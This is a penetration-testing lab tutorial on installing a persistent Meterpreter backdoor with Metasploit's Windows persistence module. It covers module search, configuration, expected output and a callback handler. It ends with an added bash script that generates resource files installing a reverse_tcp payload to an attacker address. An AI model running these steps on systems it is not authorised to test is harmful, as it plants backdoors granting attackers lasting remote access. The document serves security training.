Establish Persistence with a Metasploit Module


Introduction

In this lab, you will learn the fundamental process of establishing persistence on a target system using the Metasploit Framework. Persistence is a critical phase in penetration testing, allowing an attacker to maintain access to a compromised system even after it reboots or the initial connection is lost. We will explore how to use a specific Metasploit module to create a backdoor that automatically reconnects to your machine. This lab focuses on the commands and concepts in a controlled, simulated environment.

Gain a privileged Meterpreter session on a target

In this step, we will start the Metasploit Framework and understand the context for our task. In a real penetration test, establishing persistence is a post-exploitation activity. This means you would have already gained initial access to the target system, typically in the form of a Meterpreter session.

For this lab, we will focus on the commands and procedures for setting up persistence. We will assume that you have already successfully compromised a target and have a Meterpreter session running in the background.

First, let's launch the Metasploit console from the terminal. The -q flag provides a quiet start, suppressing the startup banner.

msfconsole -q

Your command prompt should now change to msf6 >, indicating that you are inside the Metasploit Framework.

In a real scenario with an active session, you could list it with the sessions command. To interact with it, you would use sessions -i <session_id>. To return to the msf6 > prompt to use post-exploitation modules, you would use the background command from within the Meterpreter session. We will proceed as if we have already backgrounded our session.

Search for persistence post-exploitation modules

In this step, we will search for modules within Metasploit that can help us establish persistence. Metasploit has a powerful search function that allows you to find modules based on keywords, type, platform, and more.

We are looking for a module related to "persistence". Let's use the search command inside the Metasploit console to find relevant modules.

search persistence

This command returns every exploit, auxiliary, and post module whose name or description matches the keyword. For each module the output shows its name, disclosure date, rank, whether it supports the check command, and a brief description.

Your output will look similar to this (some details may vary):

Matching Modules
================

   ##   Name                                           Disclosure Date  Rank       Check  Description
   -   ----                                           ---------------  ----       -----  -----------
   0   auxiliary/admin/http/dlink_dir_600_http_login    2013-02-01       normal     No     D-Link DIR-600 'dlink_user' Persistence
   1   exploit/linux/local/cron_persistence             2020-01-28       excellent  Yes    Cron Persistence
   2   exploit/osx/local/persistence                    2015-05-11       excellent  Yes    OS X Persistent Launchd Job
   3   exploit/windows/local/persistence                2012-08-20       excellent  No     Windows Persistent Service Installer
   4   exploit/windows/local/persistence_service        2014-09-11       excellent  Yes    Persistent Service Installer
   5   post/android/manage/remove_persistence           2018-09-20       normal     No     Remove persistence from device
   6   post/android/manage/set_persistence              2018-09-20       normal     No     Set persistence on device
   7   post/multi/manage/shell_to_meterpreter                          normal     No     Shell to Meterpreter Upgrade
   8   post/osx/manage/persistence                      2018-09-20       normal     No     Install persistence on OSX
   9   post/windows/manage/persistence_exe              2013-03-06       normal     No     Windows Manage Persistent EXE Payload
   10  post/windows/manage/ssh_inject                   2012-11-20       normal     No     Windows Manage SSH User Key Injection

As you can see, there are several options. For this lab, we will focus on exploit/windows/local/persistence, a commonly used module that uploads a VBScript launcher for your payload to the Windows target and registers it to start automatically, either through a registry Run key or, with the SERVICE startup type, as a Windows service.

Use the exploit/windows/local/persistence module

In this step, you will select the persistence module we identified previously. The use command in Metasploit loads a specific module into the current context, allowing you to configure and run it.

To select the module, you can either type its full path or use its number from the search results (e.g., use 3). Using the full path is generally more reliable as the numbers can change.

Let's load the exploit/windows/local/persistence module.

use exploit/windows/local/persistence

After running this command, your prompt will change to reflect the currently loaded module: msf6 exploit(windows/local/persistence) >.

Now that the module is loaded, we can view its options to see what needs to be configured. Use the show options command.

show options

This will display a table of all the parameters you can set for this module, their current values, and whether they are required.

Module options (exploit/windows/local/persistence):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DELAY    10               yes       Delay in seconds for persistent payload to connect back
   LHOST                     no        The local listener IP address
   LPORT    4444             no        The local listener port
   REX_PORT 0                no        The port to connect to on the remote host
   SESSION                   yes       The session to run this module on
   STARTUP  USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE)
   ...

Notice that SESSION is a required option. This is where you would specify the ID of your compromised Meterpreter session.

Configure options for automatic startup and payload

In this step, we will configure the necessary options for our persistence module. Based on the output of show options, we need to set several parameters to define how the persistence mechanism will behave. The set command is used to assign values to these options.

First, let's specify the session. In a real scenario, you would use the ID of your active session (e.g., set SESSION 1). For this lab, we will set it to 1 as a placeholder.

set SESSION 1

Next, we need to configure the payload that the persistence mechanism will execute. This payload calls back to our machine, so LHOST must be an address the target can reach and LPORT the port our handler will listen on. Because this lab has no target, we use the loopback address 127.0.0.1 purely as a placeholder; on a real engagement 127.0.0.1 would make the implant connect to the victim itself, and you would instead use your Kali host's address on the network shared with the target (as shown by ip addr). We use port 4445 rather than the default 4444 to avoid colliding with other handlers you may already have running.

set LHOST 127.0.0.1
set LPORT 4445

The STARTUP option determines how, and with what privileges, the payload starts on the target. USER registers it under the current user's Run key (HKCU), so it fires at that user's next logon and needs no elevation. SYSTEM registers it under the machine-wide Run key (HKLM), so it fires whenever any user logs on, which requires administrative rights on the session. SERVICE installs it as a Windows service that starts at boot as SYSTEM, which requires an already-elevated (SYSTEM-level) session. We choose SERVICE here because it gives the highest privileges and survives reboots without waiting for a logon. Do not mistake this for stealth: service installation is recorded in the System event log (Event ID 7045), and the Run-key variants are visible in Autoruns and in Sysmon registry events (Event ID 13). If your real session is not elevated, use USER instead or the module will fail.

set STARTUP SERVICE

You can run show options again to verify that all your settings have been applied correctly. All the values you just set should now be reflected in the "Current Setting" column.

Execute the module and verify the persistence mechanism

In this final step, we will execute the module. With all options configured, running the module will attempt to install the persistence script on the target system via the specified session. To execute the module, simply use the run or exploit command.

run

Expected Outcome: In our simulated environment this command fails because no session with ID 1 exists. The exact wording depends on your Metasploit version, but you will see an error about the invalid session similar to this:

[-] Exploit failed: Rex::Post::Meterpreter::RequestError The session is not valid.

This is the expected behavior for this lab, as we are not working with a live, compromised host.

In a real scenario with a valid session, the output would be very different. The module reports the host it is running against, uploads a VBScript that launches the payload, registers it according to the STARTUP type, and prints the path of a cleanup resource script. With STARTUP USER, which registers a Run key under HKCU, a successful run looks roughly like this (the file and key names are randomized on every run):

[*] Running module against TARGET-PC
[*] Installing persistence script...
[+] Persistence script uploaded to C:\Users\Admin\AppData\Local\Temp\abcde.vbs
[*] Creating startup registry key...
[+] Persistence registry key created at HKCU\Software\Microsoft\Windows\CurrentVersion\Run\fGhiJkL
[*] Starting the payload handler...
[+] Persistence established. The payload will run at this user's next logon.

With STARTUP SERVICE, as configured above, the registry lines are replaced by the creation of a Windows service, and the payload runs at the next boot rather than at logon.

To complete the process in a real test, you would start a handler (use exploit/multi/handler) configured with the same payload type, LHOST and LPORT you gave the persistence module (here 127.0.0.1 and 4445), set ExitOnSession to false so the listener stays up after the first callback, and run it as a background job (exploit -j). After the target reboots (or the user logs on, for USER startup), the persistent payload executes and connects back to your handler, giving you a fresh Meterpreter session. When the engagement is over, remove the backdoor: Metasploit writes a cleanup resource script whose path is printed at the end of a successful run, and executing it with the resource command from a Meterpreter session on the same host deletes the uploaded script and the registry key or service it created.
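The installation steps above and the handler setup can be driven non-interactively with msfconsole resource scripts. The following bash script is an added example and not part of the lab or of Metasploit: it generates a persistence .rc file and a matching long-lived handler .rc file, rejecting the loopback LHOST that only makes sense in this simulated lab. The module, payload and option names (exploit/windows/local/persistence, exploit/multi/handler, windows/meterpreter/reverse_tcp, SESSION, LHOST, LPORT, STARTUP, ExitOnSession) and the console commands are Metasploit's own; the function names, file names and the sample address 10.10.14.5 are assumptions made for the example.

```shell
#!/usr/bin/env bash
# Added example (not from the lab): emit msfconsole resource scripts for
#   (1) installing exploit/windows/local/persistence through an existing session
#   (2) an exploit/multi/handler listener that survives the target's reboots.
# Metasploit command/option names are real; function names and sample values are ours.
set -eu

# Refuse LHOST values the target could never reach. 127.0.0.1 is only a placeholder
# in the lab (no target exists); on a real host the implant would dial itself.
check_lhost() {
  case "$1" in
    127.*|localhost|0.0.0.0|"") return 1 ;;
    *) return 0 ;;
  esac
}

# Resource script that installs the persistent payload.
# $1 = Meterpreter session ID, $2 = LHOST, $3 = LPORT, $4 = STARTUP (USER|SYSTEM|SERVICE)
persist_rc() {
  local session="$1" lhost="$2" lport="$3" startup="${4:-USER}"
  case "$startup" in
    USER|SYSTEM|SERVICE) ;;
    *) echo "invalid STARTUP: $startup (use USER, SYSTEM or SERVICE)" >&2; return 1 ;;
  esac
  cat <<EOF
use exploit/windows/local/persistence
set SESSION $session
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set STARTUP $startup
run
EOF
}

# Resource script for the listener. ExitOnSession false keeps the handler alive after
# the first callback, and "exploit -j -z" runs it as a background job, so every reboot
# (or logon, for STARTUP USER) of the target yields a fresh session on the same handler.
handler_rc() {
  local lhost="$1" lport="$2"
  cat <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Write both scripts into a directory and print that directory; fails on a bad LHOST.
# $1 = session ID, $2 = LHOST, $3 = LPORT, $4 = STARTUP, $5 = output directory
write_rc_files() {
  local session="$1" lhost="$2" lport="$3" startup="${4:-USER}" outdir="${5:-.}"
  if ! check_lhost "$lhost"; then
    echo "LHOST $lhost is not reachable from a remote target; use your attacker IP" >&2
    return 1
  fi
  mkdir -p "$outdir"
  persist_rc "$session" "$lhost" "$lport" "$startup" > "$outdir/persist.rc"
  handler_rc "$lhost" "$lport" > "$outdir/handler.rc"
  echo "$outdir"
}

# Usage (values constructed for the example; 10.10.14.5 stands for your Kali host):
#   write_rc_files 1 10.10.14.5 4445 USER ./rc
#   msf6 > resource ./rc/persist.rc    # from the console that already holds session 1
#   msfconsole -q -r ./rc/handler.rc   # separate console; leave it running to catch callbacks
```

The persistence script is meant to be loaded with the resource command inside the console that owns the session, since a freshly started msfconsole has no session 1; the handler script can be launched in its own console with msfconsole -r. Keeping the payload line identical in both files is what guarantees the handler understands the stager the implant sends.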

Summary

In this lab, you learned the fundamental process of establishing persistence on a target system using the Metasploit Framework. You practiced searching for relevant modules, selecting and configuring the exploit/windows/local/persistence module, and understanding how it functions.

While we simulated the environment without a live target, you have learned the exact commands and workflow required to create a persistent backdoor in a real-world penetration test, together with the privilege requirements of each startup type and the artifacts the mechanism leaves behind. This skill is crucial for maintaining long-term access during security assessments, and every persistence artifact you install must be removed before the assessment closes.

Congratulations on completing the lab!